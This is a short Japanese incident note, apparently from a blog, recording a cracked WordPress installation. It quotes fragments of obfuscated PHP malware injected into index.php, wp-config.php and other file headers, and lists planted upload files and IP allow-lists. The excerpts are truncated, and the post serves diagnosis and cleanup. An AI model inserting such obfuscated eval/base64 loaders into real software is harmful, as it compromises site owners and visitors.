ページが開けない、というので、調べてみたら、クラックされたwordpressだったので、いろいろファイルをのぞいてみた記録
ざらっと調べてみたけど、被害範囲がでかすぎたので、最初から作ってもらうしかないです、という回答となりました。
・index.php に下記のような文字列が埋め込まれていた
$GLOBALS['_502176623_']=Array(base64_decode('ZXJyb3Jf' .'cm' .'V' .'wb3' .'J0aW5' .'n'),base64_decode('cHJlZ' .'19tYXRj' .'aA=' .'='),base64_decode('cHJlZ19' .'y' .'Z' .'XBsYW' .'Nl'),base64_decode('c3' .'RycG9' .'z'),base64_decode('' .'bWQ1'),base64_decode('ZnVuY' .'3Rp' .'b25fZXhpc3Rz'),base64_decode('Y3' .'Vy' .'bF9pbml' .'0'),base64_decode('Y' .'3Vyb' .'F9zZ' .'XRvcH' .'Q='),base64_decode('Y' .'3Vyb' .'F9zZXRv' .'cHQ='),base64_decode('Y' .'3V' .'yb' .'F9zZX' .'R' .'vcHQ'
<略>
+50)){echo $_8;}}elseif(@$GLOBALS['_502176623_'][13](_1644837808(1091))== round(0+0.25+0.25+0.25+0.25)){echo@$GLOBALS['_502176623_'][14]($_6);}}
//###==###
・wp-config.php 下記のようなものが数箇所に埋め込まれていた
eval(base64_decode("aWYgKCFkZWZpbmVkKCdBTFJFQURZX1JVTl8xYmMyOWIzNmYzNDJhODJhYWY2NjU4Nzg1MzU2NzE4JykpCnsKZGVmaW5lKCdBTFJFQURZX1JVTl8xYmMyOWIzNmYzNDJhODJhYWY2NjU4Nzg1MzU2NzE4JywgMSk7CgogJGF1YnRvcSA9IDE2MDU7IGZ1bmN0aW9uIHh1Y3dxbXIoJHRidmRoLCAka29pbW5nbHcpeyRuanpuZXhxcSA9ICcnOyB
<略>
neCc9PidDJywgJ3onPT4nMCcpOwpldmFsLypkeXNwZiovKHh1Y3dxbXIoJGp5Z3h0c2IsICRxemlmeGY
pKTsKfQ=="));
・wp-content/uploads/ にいろんなものがアップロードされている
[root@host wp-content]# ls -la uploads/
合計 56
drwxr-xr-x 5 apache apache 4096 12月 3 11:45 2016 .
drwxr-xr-x 7 apache apache 4096 11月 7 12:50 2016 ..
-rw-r--r-- 1 apache apache 0 5月 2 09:41 2016 1.php
drwxr-xr-x 4 apache apache 4096 10月 10 22:31 2016 2015
drwxr-xr-x 12 apache apache 4096 10月 1 01:17 2016 2016
-rw-r--r-- 1 apache apache 21377 5月 2 09:41 2016 dbc.php.suspected
-rw-r--r-- 1 apache apache 1367 11月 7 12:50 2016 jpgjsk.php.suspected
-rw-r--r-- 1 apache apache 4902 5月 2 09:41 2016 mates.php.suspected
drwxr-xr-x 2 apache apache 4096 12月 13 23:58 2016 ps_auto_sitemap
[root@host wp-content]#
・wp-admin/.bt と wp-admin/css/.bt というファイルが作成され、おそらくアクセス許可IPが記載されている
ファイル末尾に追記されるわけではなく、ソートされた順序で増えていっていた
0.5.2.2
0.83.4.1
100.2.201.8
100.35.50.239
100.43.80.14
<略>
99.98.120.94
99.98.2.226
#version:1
・いろんなphpの冒頭が下記のように書き換えられている
<?php
$h00d = 846;$GLOBALS['a287']=Array();globa
l$a287;<略>
$a287['h6d2'][65]]);}exit();} ?><?php
/**
・あと、データベースにいろいろデータが突っ込まれていた